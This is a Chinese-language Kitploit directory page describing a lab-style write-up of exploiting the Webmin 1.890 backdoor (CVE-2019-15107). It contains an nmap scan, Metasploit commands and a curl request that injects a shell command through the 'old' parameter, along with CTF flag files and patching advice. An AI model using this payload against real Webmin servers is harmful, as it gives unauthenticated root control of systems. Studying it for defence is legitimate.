Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — 研究目标:对 Webmin 1.890 版本(CVE-2019-15107)中的远程代码执行(RCE)漏洞进行全面分析并成功利用,最终完全控制目标系统。 | Kitploit
工具/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试学习与教育实验室与实践
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

研究目标:对 Webmin 1.890 版本(CVE-2019-15107)中的远程代码执行(RCE)漏洞进行全面分析并成功利用,最终完全控制目标系统。

查看仓库
31年前尚未审核
分享

研究目标: 对Webmin 1.890版本中的一个远程代码执行(RCE)漏洞(CVE-2019-15107)进行全面的分析和成功利用,最终完全控制目标系统。

方法论:

初始侦察:

使用Nmap进行网络扫描:

root@kitploit:~
nmap -sV -sC -A -p- 10.201.105.185

发现运行在端口10000上的Webmin 1.890服务

漏洞分析:

研究了password_change.cgi中的漏洞机制

确认了未经认证的任意命令执行的可能性

利用:

实现了两种攻击向量:

使用Metasploit框架:

root@kitploit:~
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit

通过curl手动利用:

root@kitploit:~
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"

后渗透:

获取了交互式root shell

进行了文件系统分析

发现flag文件:

root@kitploit:~
/home/dark/user.txt
/root/root.txt

发现:

成功利用了CVE-2019-15107漏洞

获得了系统的完全root权限

展示了及时软件更新的关键重要性

技术结论:

漏洞允许通过"old"参数注入执行任意命令

缺乏身份验证检查使得这一点特别危险

1.890版本包含一个在后来的版本中修补的后门

安全建议:

立即升级到当前Webmin版本

通过IP限制管理面板的访问

定期对Web应用程序进行安全审计

进一步研究方向:

分析其他Webmin漏洞

开发不使用Metasploit的自定义利用

研究被攻陷系统中的持久化技术

本案例研究展示了及时系统更新的关键重要性以及在部署的软件中持续漏洞监控的必要性。该研究提供了现代Web应用程序利用技术的实用见解,同时强调了基本的安全原则。

下载工具